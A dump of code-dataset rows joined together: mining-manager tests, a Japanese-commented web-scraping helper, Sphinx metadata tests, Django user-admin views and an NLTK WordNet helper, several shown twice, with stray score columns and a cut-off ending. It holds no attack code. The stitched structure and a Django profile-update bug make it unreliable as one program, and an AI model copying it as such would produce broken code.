self.assertEqual(0, conn2.current_job.height)
params1 = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
params2 = {
'job_id': conn2.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
# First submission: success
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
conn1.method_submit(params=params1, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
# Run the main loop to update the jobs.
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn1.current_job.height)
self.assertEqual(1, conn2.current_job.height)
# As jobs have been updated, the submission from the second miner will be accepted but not propagated.
# Second submission: success and not propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params2, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def _run_basic_tx_tests(self, conn, tx_data, tx_nonce):
job = TxJob(tx_data)
ret = self.manager.add_job(job)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job)
self.assertTrue(ret)
# First submission: wrong nonce
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '84e20000',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
conn.send_result.assert_not_called()
self.assertFalse(conn.current_job.is_block)
# Second submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': tx_nonce,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Third submission: stale
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
def test_one_miner_one_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TX1_DATA, TX1_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_one_miner_two_txs(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
job1 = TxJob(TX1_DATA)
job2 = TxJob(TX2_DATA)
ret1 = self.manager.add_job(job1)
ret2 = self.manager.add_job(job2)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job1)
self.assertTrue(ret1)
self.assertTrue(ret2)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': TX1_NONCE,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Run loop and check that the miner gets the next tx
self._run_all_pending_events()
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job2)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': TX2_NONCE,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_mining_tx_connection_lost(self):
conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn1.current_job)
self.assertTrue(conn1.current_job.is_block)
self.assertEqual(0, conn1.current_job.height)
conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn2.current_job)
self.assertTrue(conn2.current_job.is_block)
self.assertEqual(0, conn2.current_job.height)
job = TxJob(TX1_DATA)
ret = self.manager.add_job(job)
self.assertTrue(ret)
self.assertFalse(conn1.current_job.is_block)
self.assertEqual(conn1.current_job.tx_job, job)
self.assertEqual(conn2.current_job.tx_job, job)
# Miner 1 disconnects.
conn1.connection_lost(exc=None)
self.assertFalse(conn2.current_job.is_block)
self.assertEqual(conn2.current_job.tx_job, job)
# Miner 2 disconnects. Tx stays on the queue.
conn2.connection_lost(exc=None)
self.assertEqual(deque([job]), self.manager.tx_queue)
# Miner 3 connects. Tx is sent to the new miner.
conn3 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertFalse(conn3.current_job.is_block)
self.assertEqual(conn3.current_job.tx_job, job)
def test_token_creation_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TOKEN_CREATION_TX_DATA, TOKEN_CREATION_TX_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_no_miners_at_start(self):
from txstratum.constants import DEFAULT_EXPECTED_MINING_TIME
expected_queue_time = 0
job1 = TxJob(TX1_DATA)
self.assertTrue(self.manager.add_job(job1))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job1.expected_mining_time)
self.assertEqual(0, job1.expected_queue_time)
self.assertEqual(1, len(self.manager.tx_queue))
if DEFAULT_EXPECTED_MINING_TIME > 0:
expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
job2 = TxJob(TX2_DATA)
self.assertTrue(self.manager.add_job(job2))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job2.expected_mining_time)
self.assertEqual(expected_queue_time, job2.expected_queue_time)
self.assertEqual(2, len(self.manager.tx_queue))
if DEFAULT_EXPECTED_MINING_TIME > 0:
expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
job3 = TxJob(TOKEN_CREATION_TX_DATA)
self.assertTrue(self.manager.add_job(job3))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job3.expected_mining_time)
self.assertEqual(expected_queue_time, job3.expected_queue_time)
self.assertEqual(3, len(self.manager.tx_queue))
self.assertEqual([job1, job2, job3], list(self.manager.tx_queue))
# First miner connects and receives job1.
conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn1.current_job)
self.assertEqual(job1, conn1.current_job.tx_job)
# Second miner connects and receives job1.
conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn2.current_job)
self.assertEqual(job1, conn2.current_job.tx_job)
class ManagerClockedTestCase(asynctest.ClockedTestCase): # type: ignore
def setUp(self):
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
from tests.utils import Clock
self.clock = Clock(self.loop)
self.clock.enable()
self.client = HathorClientTest(server_url='')
self.loop.run_until_complete(self.client.start())
self.manager = TxMiningManager(backend=self.client, address=address)
self.loop.run_until_complete(self.manager.start())
self.loop.run_until_complete(self.manager.wait_for_block_template())
self.assertTrue(len(self.manager.block_template) > 0)
def tearDown(self):
self.clock.disable()
async def test_block_timestamp_update(self):
job = self.manager.get_best_job(None)
self.assertTrue(True, job.is_block)
job.update_timestamp(force=True)
self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
# Update timestamp.
await self.advance(10)
job.update_timestamp()
self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
# Do not update timestamp.
old_ts = txstratum.time.time()
await self.advance(40)
job.update_timestamp()
self.assertEqual(int(old_ts), job._block.timestamp)
async def test_tx_resubmit(self):
job1 = TxJob(TX1_DATA, timeout=10)
ret1 = self.manager.add_job(job1)
self.assertTrue(ret1)
# When a similar job is submitted, manager declines it.
job2 = TxJob(TX1_DATA)
ret2 = self.manager.add_job(job2)
self.assertFalse(ret2)
# Wait until job1 is marked as timeout.
await self.advance(15)
self.assertEqual(job1.status, JobStatus.TIMEOUT)
# Try to resubmit a similar job.
job3 = TxJob(TX1_DATA)
ret3 = self.manager.add_job(job3)
self.assertTrue(ret3)
async def test_tx_timeout_and_cleanup(self):
job1 = TxJob(TX1_DATA, timeout=10)
ret1 = self.manager.add_job(job1)
self.assertTrue(ret1)
self.assertIn(job1, self.manager.tx_queue)
self.assertIn(job1.uuid, self.manager.tx_jobs)
# Wait until job1 is marked as timeout.
await self.advance(15)
self.assertEqual(job1.status, JobStatus.TIMEOUT)
self.assertNotIn(job1, self.manager.tx_queue)
self.assertIn(job1.uuid, self.manager.tx_jobs)
# Wait until job1 is cleared.
await self.advance(self.manager.TX_CLEAN_UP_INTERVAL)
self.assertNotIn(job1, self.manager.tx_queue)
self.assertNotIn(job1.uuid, self.manager.tx_jobs)
async def test_tx_race_condition(self):
"""Test race condition caused when job2 replaces job1 and job1's clean up is close to be executed.
In this case job1's clean up was cleaning job2 instead.
"""
job1 = TxJob(TX1_DATA, timeout=10)
ret1 = self.manager.add_job(job1)
self.assertTrue(ret1)
# Wait until job1 is marked as timeout.
await self.advance(10)
self.assertEqual(job1.status, JobStatus.TIMEOUT)
self.assertNotIn(job1, self.manager.tx_queue)
self.assertIn(job1.uuid, self.manager.tx_jobs)
# We are 1 second away to cleanup the tx.
await self.advance(self.manager.TX_CLEAN_UP_INTERVAL - 1)
# Resubmit a similar job.
job2 = TxJob(TX1_DATA, timeout=10)
ret2 = self.manager.add_job(job2)
self.assertTrue(ret2)
self.assertIn(job2, self.manager.tx_queue)
self.assertIn(job2.uuid, self.manager.tx_jobs)
# Reach the cleanup time of job1.
await self.advance(2)
self.assertEqual(job2.status, JobStatus.ENQUEUED)
self.assertIn(job2, self.manager.tx_queue)
self.assertIn(job2.uuid, self.manager.tx_jobs)
# Job2 timeouts.
await self.advance(15)
self.assertEqual(job2.status, JobStatus.TIMEOUT) | 0.620047 | 0.191895 |
import logging
import socket
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse, parse_qs
from bs4 import BeautifulSoup
from django.utils.translation import gettext
from pypeach_django.app_config import AppConfig
"""
Scrapy関連の共通処理を定義する
"""
class ScrapyHelper:
@staticmethod
def get_html(url, parse_flag=None):
"""
scrapyを行いhtmlを取得する
"""
# User-Agentを定義する
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) ' \
'AppleWebKit/537.36 (KHTML, like Gecko) ' \
'Chrome/55.0.2883.95 Safari/537.36 '
# アクセスのリトライ回数を指定する
retry_max_count = AppConfig.get_properties("url_request_retry_max_count")
response_html = None
for i in range(0, retry_max_count):
try:
# Webアクセス時のUser-Agentを指定する
logging.debug("request settings")
req = urllib.request.Request(url, headers={'User-Agent': ua})
# Webアクセスの読み込みを行う
logging.debug("request read start")
with urllib.request.urlopen(req, timeout=AppConfig.get_properties("url_request_read_timeout")) as f:
html = f.read().decode('utf-8')
logging.debug("request read end")
# レスポンスをHTMLパーサーでパースする
logging.debug("request parse start")
if parse_flag is True:
response_html = BeautifulSoup(html, 'lxml')
else:
response_html = html
logging.debug("request parse end")
if response_html is not None and len(response_html) > 0:
break
except HTTPError as e:
# HTTPError時のメッセージを出力する
logging.info(gettext("I801"), url, e.code, e.msg)
except URLError as error:
# タイムアウトを判定する
if isinstance(error.reason, socket.timeout):
logging.info(gettext("I802"), url)
else:
logging.info(gettext("E991"), error.reason)
raise URLErrorException(gettext("E990") % url)
except socket.timeout:
logging.info(gettext("I802"), url)
except ConnectionResetError as error:
# [Errno 104] Connection reset by peerを回避する
logging.info(gettext("I802"), url)
except Exception as error:
logging.info(gettext("E991"), error)
raise ScrapyIllegalException(gettext("E990") % url)
# レスポンスがない場合はExceptionにする
if response_html is None:
error_msg = "{}:{}".format(gettext("E803"), url)
raise HttpErrorException(error_msg)
return response_html
@staticmethod
def is_exists_class_name(html, class_name):
"""
html内のクラス有無をチェックする
"""
is_exists_flag = False
try:
# class有無を判定する
if len(html.select('.' + class_name)) > 0 or class_name in html["class"]:
is_exists_flag = True
except (KeyError, AttributeError):
# エラーの場合はfalseを返却する
pass
return is_exists_flag
@staticmethod
def get_url_parameter(url, parameter_name):
"""
URLのパラメータ値を取得する
"""
try:
# URLをパースして指定されたパラメータ名を取得する
url_parse = urlparse(url)
url_query = parse_qs(url_parse.query)
value = url_query[parameter_name][0]
except KeyError as e:
# エラーの場合はログを出力してNoneを返却する
logging.debug(gettext("W801"), e)
return None
return value
class HttpErrorException(Exception):
"""
Exception(httpエラー)を定義する
"""
pass
class URLErrorException(Exception):
"""
Exception(サーバ接続エラー)を定義する
"""
pass
class ScrapyIllegalException(Exception):
"""
Exception(その他エラー)を定義する
"""
pass | backend/chart/application/helper/scrapy.py | import logging
import socket
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse, parse_qs
from bs4 import BeautifulSoup
from django.utils.translation import gettext
from pypeach_django.app_config import AppConfig
"""
Scrapy関連の共通処理を定義する
"""
class ScrapyHelper:
@staticmethod
def get_html(url, parse_flag=None):
"""
scrapyを行いhtmlを取得する
"""
# User-Agentを定義する
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) ' \
'AppleWebKit/537.36 (KHTML, like Gecko) ' \
'Chrome/55.0.2883.95 Safari/537.36 '
# アクセスのリトライ回数を指定する
retry_max_count = AppConfig.get_properties("url_request_retry_max_count")
response_html = None
for i in range(0, retry_max_count):
try:
# Webアクセス時のUser-Agentを指定する
logging.debug("request settings")
req = urllib.request.Request(url, headers={'User-Agent': ua})
# Webアクセスの読み込みを行う
logging.debug("request read start")
with urllib.request.urlopen(req, timeout=AppConfig.get_properties("url_request_read_timeout")) as f:
html = f.read().decode('utf-8')
logging.debug("request read end")
# レスポンスをHTMLパーサーでパースする
logging.debug("request parse start")
if parse_flag is True:
response_html = BeautifulSoup(html, 'lxml')
else:
response_html = html
logging.debug("request parse end")
if response_html is not None and len(response_html) > 0:
break
except HTTPError as e:
# HTTPError時のメッセージを出力する
logging.info(gettext("I801"), url, e.code, e.msg)
except URLError as error:
# タイムアウトを判定する
if isinstance(error.reason, socket.timeout):
logging.info(gettext("I802"), url)
else:
logging.info(gettext("E991"), error.reason)
raise URLErrorException(gettext("E990") % url)
except socket.timeout:
logging.info(gettext("I802"), url)
except ConnectionResetError as error:
# [Errno 104] Connection reset by peerを回避する
logging.info(gettext("I802"), url)
except Exception as error:
logging.info(gettext("E991"), error)
raise ScrapyIllegalException(gettext("E990") % url)
# レスポンスがない場合はExceptionにする
if response_html is None:
error_msg = "{}:{}".format(gettext("E803"), url)
raise HttpErrorException(error_msg)
return response_html
@staticmethod
def is_exists_class_name(html, class_name):
"""
html内のクラス有無をチェックする
"""
is_exists_flag = False
try:
# class有無を判定する
if len(html.select('.' + class_name)) > 0 or class_name in html["class"]:
is_exists_flag = True
except (KeyError, AttributeError):
# エラーの場合はfalseを返却する
pass
return is_exists_flag
@staticmethod
def get_url_parameter(url, parameter_name):
"""
URLのパラメータ値を取得する
"""
try:
# URLをパースして指定されたパラメータ名を取得する
url_parse = urlparse(url)
url_query = parse_qs(url_parse.query)
value = url_query[parameter_name][0]
except KeyError as e:
# エラーの場合はログを出力してNoneを返却する
logging.debug(gettext("W801"), e)
return None
return value
class HttpErrorException(Exception):
"""
Exception(httpエラー)を定義する
"""
pass
class URLErrorException(Exception):
"""
Exception(サーバ接続エラー)を定義する
"""
pass
class ScrapyIllegalException(Exception):
"""
Exception(その他エラー)を定義する
"""
pass | 0.226527 | 0.058373 |
from __future__ import absolute_import
from tests import util
_EXPECT_NAME = 'publishing.withsphinx'
_EXPECT_VERSION = '0.0.1'
_EXPECT_DATE = '2016-10-11'
_EXPECT_AUTHOR = '<NAME>'
_EXPECT_AUTHOR_EMAIL = '<EMAIL>'
_EXPECT_SPHINX_EXTENSION_METADATA = {
'version': _EXPECT_VERSION,
'parallel_read_safe': True,
'parallel_write_safe': True,
}
class TestMetaData(util.TestCasePublishingSphinx):
def test_package_has_extension_name_string(self):
'''
UNIT TEST: package has name string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__name__, str))
self.assertEqual(pws.__name__, _EXPECT_NAME)
def test_package_has_extension_version_string(self):
'''
UNIT TEST: package has version string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__version__, str))
self.assertEqual(pws.__version__, _EXPECT_VERSION)
def test_package_has_extension_date_string(self):
'''
UNIT TEST: package has date string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__date__, str))
self.assertEqual(pws.__date__, _EXPECT_DATE)
def test_package_has_extension_author_string(self):
'''
UNIT TEST: package has author string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author__, str))
self.assertEqual(pws.__author__, _EXPECT_AUTHOR)
def test_package_has_extension_author_email_string(self):
'''
UNIT TEST: package has author email string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author_email__, str))
self.assertEqual(pws.__author_email__, _EXPECT_AUTHOR_EMAIL)
def test_package_has_setup_returns_with_meta(self):
'''
UNIT TEST: package has setup returns with meta data
'''
import publishing.withsphinx as pws
app = util.mock.MagicMock()
self.assertEqual(pws.setup(app), _EXPECT_SPHINX_EXTENSION_METADATA)
if __name__ == "__main__":
util.main() | tests/unit/test_meta_data.py | from __future__ import absolute_import
from tests import util
_EXPECT_NAME = 'publishing.withsphinx'
_EXPECT_VERSION = '0.0.1'
_EXPECT_DATE = '2016-10-11'
_EXPECT_AUTHOR = '<NAME>'
_EXPECT_AUTHOR_EMAIL = '<EMAIL>'
_EXPECT_SPHINX_EXTENSION_METADATA = {
'version': _EXPECT_VERSION,
'parallel_read_safe': True,
'parallel_write_safe': True,
}
class TestMetaData(util.TestCasePublishingSphinx):
def test_package_has_extension_name_string(self):
'''
UNIT TEST: package has name string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__name__, str))
self.assertEqual(pws.__name__, _EXPECT_NAME)
def test_package_has_extension_version_string(self):
'''
UNIT TEST: package has version string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__version__, str))
self.assertEqual(pws.__version__, _EXPECT_VERSION)
def test_package_has_extension_date_string(self):
'''
UNIT TEST: package has date string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__date__, str))
self.assertEqual(pws.__date__, _EXPECT_DATE)
def test_package_has_extension_author_string(self):
'''
UNIT TEST: package has author string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author__, str))
self.assertEqual(pws.__author__, _EXPECT_AUTHOR)
def test_package_has_extension_author_email_string(self):
'''
UNIT TEST: package has author email string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author_email__, str))
self.assertEqual(pws.__author_email__, _EXPECT_AUTHOR_EMAIL)
def test_package_has_setup_returns_with_meta(self):
'''
UNIT TEST: package has setup returns with meta data
'''
import publishing.withsphinx as pws
app = util.mock.MagicMock()
self.assertEqual(pws.setup(app), _EXPECT_SPHINX_EXTENSION_METADATA)
if __name__ == "__main__":
util.main() | 0.609757 | 0.377369 |
from django.http.response import Http404, HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from rest_framework.parsers import JSONParser
from rest_framework.decorators import api_view
from django.contrib.auth.models import User
from .models import Profile
import json
@login_required
# Create your views here.
def index(request):
users = User.objects.all().select_related('profile')[:15]
return render(request, 'users/index.html', { 'users': users })
@login_required
def create(request):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
return render(request, 'users/create.html')
@login_required
def edit(request, id):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
users = User.objects.filter(pk=id).select_related('profile')
if len(users) <= 0:
raise Http404('User does not exists.')
return render(request, 'users/edit.html', { 'mUser': users[0] })
@login_required
@api_view(['GET'])
def search(request):
q = request.GET['q']
users = User.objects.filter(username__contains=q).select_related('profile').values('username', 'first_name', 'last_name', 'profile__role', 'profile__sex')
return JsonResponse({
'users': json.dumps(list(users))
}, safe=False)
@login_required
@api_view(['POST'])
def store(request):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.create(username=body['username'], first_name=body['first_name'], last_name=body['last_name'])
user.set_password(body['password'])
user.profile.sex = body['sex']
user.profile.role = body['role']
user.save()
return JsonResponse({
'message': 'Successfully created a user.'
}, safe=False)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['PATCH'])
def update(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.get(pk=id)
user.username = body['username']
user.first_name = body['first_name']
user.last_name = body['last_name']
if body['password']:
user.set_password(body['password'])
profile = Profile(user=user, sex=body['sex'], role=body['role'])
user.save()
profile.save()
return JsonResponse({
'message': 'Successfully updated a user.'
}, safe=False)
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['DELETE'])
def delete(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
user = User.objects.get(pk=id)
if user.is_staff:
raise Exception('You do not have permsision to make this operation.')
user.delete()
return JsonResponse({
'message': 'Successfully deleted a user.'
})
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400) | smart_cctv/users/views.py | from django.http.response import Http404, HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from rest_framework.parsers import JSONParser
from rest_framework.decorators import api_view
from django.contrib.auth.models import User
from .models import Profile
import json
@login_required
# Create your views here.
def index(request):
users = User.objects.all().select_related('profile')[:15]
return render(request, 'users/index.html', { 'users': users })
@login_required
def create(request):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
return render(request, 'users/create.html')
@login_required
def edit(request, id):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
users = User.objects.filter(pk=id).select_related('profile')
if len(users) <= 0:
raise Http404('User does not exists.')
return render(request, 'users/edit.html', { 'mUser': users[0] })
@login_required
@api_view(['GET'])
def search(request):
q = request.GET['q']
users = User.objects.filter(username__contains=q).select_related('profile').values('username', 'first_name', 'last_name', 'profile__role', 'profile__sex')
return JsonResponse({
'users': json.dumps(list(users))
}, safe=False)
@login_required
@api_view(['POST'])
def store(request):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.create(username=body['username'], first_name=body['first_name'], last_name=body['last_name'])
user.set_password(body['password'])
user.profile.sex = body['sex']
user.profile.role = body['role']
user.save()
return JsonResponse({
'message': 'Successfully created a user.'
}, safe=False)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['PATCH'])
def update(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.get(pk=id)
user.username = body['username']
user.first_name = body['first_name']
user.last_name = body['last_name']
if body['password']:
user.set_password(body['password'])
profile = Profile(user=user, sex=body['sex'], role=body['role'])
user.save()
profile.save()
return JsonResponse({
'message': 'Successfully updated a user.'
}, safe=False)
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['DELETE'])
def delete(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
user = User.objects.get(pk=id)
if user.is_staff:
raise Exception('You do not have permsision to make this operation.')
user.delete()
return JsonResponse({
'message': 'Successfully deleted a user.'
})
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400) | 0.427277 | 0.05526 |
from nltk.corpus import wordnet as wn
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
import nltk
def get_words_with_all_langs(synset_id):
langs = sorted(wn.langs())
list_lang = []
list_useful_lang=[]
for lang in langs:
if lang not in list_lang:
list_lang.append(lang)
dict_lang={}
for lang in list_lang:
try:
names = wn.synset(synset_id).lemma_names(lang)
# print(lang, names)
if len(names)!=0:
dict_lang[lang]=names
if lang not in list_useful_lang:
list_useful_lang.append(lang)
except:
# print("Error: Lang: "+lang)
pass
return dict_lang,list_useful_lang
def get_words_from_sentence(sentence):
word_list=word_tokenize(sentence)
filtered_words = [word.lower() for word in word_list if word not in stopwords.words('english')]
# st = LancasterStemmer()
lem = WordNetLemmatizer()
list_w=[]
for w in filtered_words:
list_w.append(lem.lemmatize(w))
return list_w
def get_hyponyms(synset_name):
synsets=wn.synset(synset_name).hyponyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_hypernyms(synset_name):
synsets=wn.synset(synset_name).hypernyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_all_related_word_from_text(text,use_hyponym=False,use_hypernym=False):
word_list = get_words_from_sentence(text)
print(word_list)
dict_lang_all = {}
for w in word_list:
print(w)
synsets = wn.synsets(w)
print(synsets)
for synset in synsets:
synset_name = synset.name()
print("synset.name = ", synset_name)
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
print(dict_langs)
# current
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
# hyponyms
if use_hyponym:
dict_lang_hyponyms=get_hyponyms(synset_name)
for lang in dict_lang_hyponyms:
if lang in dict_lang_all:
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
# hypernyms
if use_hypernym:
dict_lang_hypernyms = get_hypernyms(synset_name)
for lang in dict_lang_hypernyms:
if lang in dict_lang_all:
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
# print()
return dict_lang_all | src/semantickit/lang/wordnet.py | from nltk.corpus import wordnet as wn
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
import nltk
def get_words_with_all_langs(synset_id):
langs = sorted(wn.langs())
list_lang = []
list_useful_lang=[]
for lang in langs:
if lang not in list_lang:
list_lang.append(lang)
dict_lang={}
for lang in list_lang:
try:
names = wn.synset(synset_id).lemma_names(lang)
# print(lang, names)
if len(names)!=0:
dict_lang[lang]=names
if lang not in list_useful_lang:
list_useful_lang.append(lang)
except:
# print("Error: Lang: "+lang)
pass
return dict_lang,list_useful_lang
def get_words_from_sentence(sentence):
word_list=word_tokenize(sentence)
filtered_words = [word.lower() for word in word_list if word not in stopwords.words('english')]
# st = LancasterStemmer()
lem = WordNetLemmatizer()
list_w=[]
for w in filtered_words:
list_w.append(lem.lemmatize(w))
return list_w
def get_hyponyms(synset_name):
synsets=wn.synset(synset_name).hyponyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_hypernyms(synset_name):
synsets=wn.synset(synset_name).hypernyms()
dict_lang_all = {}
for synset in synsets:
synset_name = synset.name()
dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
return dict_lang_all
def get_all_related_word_from_text(text,use_hyponym=False,use_hypernym=False):
word_list = get_words_from_sentence(text)
print(word_list)
dict_lang_all = {}
for w in word_list:
print(w)
synsets = wn.synsets(w)
print(synsets)
for synset in synsets:
synset_name = synset.name()
print("synset.name = ", synset_name)
